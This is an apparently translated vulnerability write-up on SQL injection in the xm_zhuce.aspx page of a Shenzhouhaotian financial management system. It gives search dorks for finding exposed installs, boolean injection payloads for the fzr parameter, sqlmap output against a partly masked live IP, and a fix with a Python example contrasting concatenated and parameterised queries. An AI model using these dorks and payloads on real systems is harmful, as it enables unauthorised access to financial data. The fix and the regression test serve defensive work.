SQL injection in a Shenzhouhaotian financial management system, and the solution
Google: inurl:xm_zhuce.aspx
or
Baidu or Google: Great-Chn
or: content.aspx?lb=dl
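Vulnerable file:
xm_zhuce.aspx
Simple test: the two POST bodies below differ only in the condition injected into fzr (true, then false); if the page responds differently to them, fzr is injectable.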
DropDownList1=gxzhcx&bmbh=1&xmbh=2&fzr=3' or '1'='1&pwd1=4&pwd2=4
DropDownList1=gxzhcx&bmbh=1&xmbh=2&fzr=3' or '1'='2&pwd1=4&pwd2=4
In addition, scanner output (sqlmap format):
http://222.206.2XX.75/xm_zhuce.aspx
Place: POST
Parameter: fzr
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTM3NzYyMTE0OGR
kN3CduEi0KLd3vBgmXUu9+bmY+8Y=&__VIEWSTATEGENERATOR=2C9BDDA5&__EVENTVALIDATION=/w
EWCwLOu8+rAgKM54rGBgK7q7GGCAKbvu/vBgLnqrLLBwKI3NSmDQL+xp2pBAKYx52pBALKs+yXBQLGmf
2HCALGmemsD8y55BmO8Kl+GFBZlOrv8LXqpMCh&Button2=%CC%E1%BD%BB&DropDownList1=gxzhcx
&bmbh=1&xmbh=2&fzr=' or '1'='1 ' AND 1543=1543 AND 'eOUS'='eOUS&pwd1=4&pwd2=4
Solution:
bmbh=1&xmbh=2&fzr=1
All three parameters are affected.
They must all be properly filtered, and their values must be forcibly converted to the expected type.
You can check with:
' or 1=2 --
' or 1=1 --
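The solution above, sketched as an added example (not code from the original page or from the vendor). Python with an in-memory SQLite table stands in for the ASP.NET application and its database; the table name xm, the column types and the lookup query are assumptions. It runs the page's true/false fzr probes against a concatenated query and against one that forcibly converts bmbh and xmbh to integers and, in place of hand-written filtering, binds fzr as a query parameter.

```python
import sqlite3

def make_db():
    # Constructed stand-in schema; the real application's tables are not on the page.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE xm (bmbh INTEGER, xmbh INTEGER, fzr TEXT)")
    db.execute("INSERT INTO xm VALUES (1, 2, 'zhang')")  # constructed sample row
    return db

def exists_vulnerable(db, bmbh, xmbh, fzr):
    # Vulnerable pattern: request values are concatenated into the SQL text,
    # so a quote in fzr ends the string literal and the rest is parsed as SQL.
    sql = ("SELECT COUNT(*) FROM xm WHERE bmbh=" + bmbh +
           " AND xmbh=" + xmbh + " AND fzr='" + fzr + "'")
    return db.execute(sql).fetchone()[0] > 0

def to_int(value, name):
    # Forced type conversion: only short runs of ASCII digits are accepted.
    if not (value.isascii() and value.isdigit() and len(value) <= 9):
        raise ValueError(name + " must be a non-negative integer")
    return int(value)

def exists_hardened(db, bmbh, xmbh, fzr):
    # Numeric fields are converted before use; fzr is length-checked and bound
    # as a parameter, so quotes inside it stay data and never become SQL syntax.
    if not 0 < len(fzr) <= 50:
        raise ValueError("fzr length out of range")
    row = db.execute(
        "SELECT COUNT(*) FROM xm WHERE bmbh=? AND xmbh=? AND fzr=?",
        (to_int(bmbh, "bmbh"), to_int(xmbh, "xmbh"), fzr)).fetchone()
    return row[0] > 0

def demo():
    db = make_db()
    # The two fzr values from the page's simple test.
    true_probe, false_probe = "3' or '1'='1", "3' or '1'='2"
    return {
        # Different answers for the two probes: the condition reached the query.
        "vulnerable": (exists_vulnerable(db, "1", "2", true_probe),
                       exists_vulnerable(db, "1", "2", false_probe)),
        # Same answer for both: the probe is compared as a literal name.
        "hardened": (exists_hardened(db, "1", "2", true_probe),
                     exists_hardened(db, "1", "2", false_probe)),
    }

if __name__ == "__main__":
    print(demo())
```

The same true/false pair doubles as a regression test after the fix: both requests must produce the same response.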